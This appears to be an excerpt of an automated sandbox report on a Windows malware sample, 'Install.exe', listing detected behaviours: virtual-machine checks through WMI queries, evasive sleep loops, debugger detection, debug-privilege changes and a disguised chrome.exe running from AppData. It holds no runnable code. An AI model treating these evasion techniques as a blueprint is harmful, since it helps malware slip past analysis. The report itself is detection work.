Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\AppData\Roaming\34432.exe TID: 6972	Thread sleep count: 68 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe TID: 6972	Thread sleep time: -68000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7116	Thread sleep count: 5547 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7112	Thread sleep count: 3401 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3684	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6780	Thread sleep count: 5587 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6772	Thread sleep count: 2582 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4120	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2296	Thread sleep count: 989 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3724	Thread sleep count: 137 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5248	Thread sleep count: 2928 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2596	Thread sleep count: 272 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6600	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 480	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe TID: 3296	Thread sleep count: 35 > 30
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe TID: 3296	Thread sleep time: -35000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe TID: 6828	Thread sleep count: 77 > 30
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe TID: 6828	Thread sleep time: -77000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2912	Thread sleep count: 3963 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1368	Thread sleep count: 581 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1344	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5384	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5340	Thread sleep count: 1048 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5340	Thread sleep count: 151 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7148	Thread sleep count: 63 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4180	Thread sleep time: -922337203685477s >= -30000s

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5547	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3401	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5587	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2582	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 989
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2928
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3963
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 581
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1048

Found evasive API chain checking for process token information

Source: C:\Windows\System32\dllhost.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

Found large amount of non-executed APIs

Source: C:\Windows\System32\lsass.exe	API coverage: 3.2 %
Source: C:\Windows\System32\svchost.exe	API coverage: 3.2 %
Source: C:\Windows\System32\svchost.exe	API coverage: 3.2 %

Found evasive API chain (may stop execution after accessing registry keys)

Source: C:\Windows\System32\lsass.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\svchost.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\Install.exe

API call chain: ExitProcess graph end node

Source: C:\Users\user\AppData\Roaming\34432.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Install.exe	Code function: 1_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	1_2_00405C49
Source: C:\Users\user\Desktop\Install.exe	Code function: 1_2_00406873 FindFirstFileW,FindClose,	1_2_00406873
Source: C:\Users\user\Desktop\Install.exe	Code function: 1_2_0040290B FindFirstFileW,	1_2_0040290B
Source: C:\Windows\System32\nslookup.exe	Code function: 22_2_0000000140006E1C FindFirstFileExW,	22_2_0000000140006E1C
Source: C:\Windows\System32\dllhost.exe	Code function: 39_2_00000001400073C8 FindFirstFileExW,	39_2_00000001400073C8
Source: C:\Windows\System32\winlogon.exe	Code function: 42_2_000001AFDDD0D0E4 FindFirstFileExW,	42_2_000001AFDDD0D0E4
Source: C:\Windows\System32\lsass.exe	Code function: 44_2_00000240B2BBD0E4 FindFirstFileExW,	44_2_00000240B2BBD0E4
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000001CAF3D0D0E4 FindFirstFileExW,	47_2_000001CAF3D0D0E4
Source: C:\Windows\System32\svchost.exe	Code function: 49_2_000001B8BFF4D0E4 FindFirstFileExW,	49_2_000001B8BFF4D0E4

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\System32\nslookup.exe

Code function: 22_2_0000000140005D5C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

22_2_0000000140005D5C

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\System32\nslookup.exe

Code function: 22_2_00000001400090E0 GetProcessHeap,

22_2_00000001400090E0

Enables debug privileges

Source: C:\Users\user\AppData\Roaming\34432.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\dllhost.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Roaming\34432.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Windows\System32\nslookup.exe	Code function: 22_2_00000001400021B8 SetUnhandledExceptionFilter,_invalid_parameter_noinfo,	22_2_00000001400021B8
Source: C:\Windows\System32\nslookup.exe	Code function: 22_2_0000000140002CF4 SetUnhandledExceptionFilter,	22_2_0000000140002CF4
